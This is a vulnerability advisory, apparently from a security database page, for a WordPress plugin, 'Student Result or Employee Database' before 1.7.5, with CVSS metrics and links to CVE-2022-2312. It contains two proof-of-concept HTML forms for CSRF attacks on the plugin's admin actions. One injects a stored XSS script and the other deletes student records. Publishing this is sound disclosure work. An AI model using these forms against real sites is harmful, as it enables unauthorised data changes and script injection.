Lucene search
Vinay Varma MudunuriWPEX-ID:7548C1FB-77B5-4290-A297-35820EDFE0F8HistoryAug 01, 2022 - 12:00 a.m.
Student Result or Employee Database < 1.7.5 - Stored Cross Site Scripting via CSRF
2022-08-0100:00:00
Vinay Varma Mudunuri
76
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
The plugin does not have CSRF in its AJAX actions, allowing attackers to make logged in user with a role as low as contributor to add/edit and delete students via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site scripting
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
<input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?action= ssr_del_st_submit" method="POST">
<input type="hidden" name="postID" value="<RID>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
prion
prion
Cross site scripting
2022-08-22 15:15:00
cve
cve
CVE-2022-2312
2022-08-22 15:15:00
wpvulndb
wpvulndb
patchstack
patchstack
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Related for WPEX-ID:7548C1FB-77B5-4290-A297-35820EDFE0F8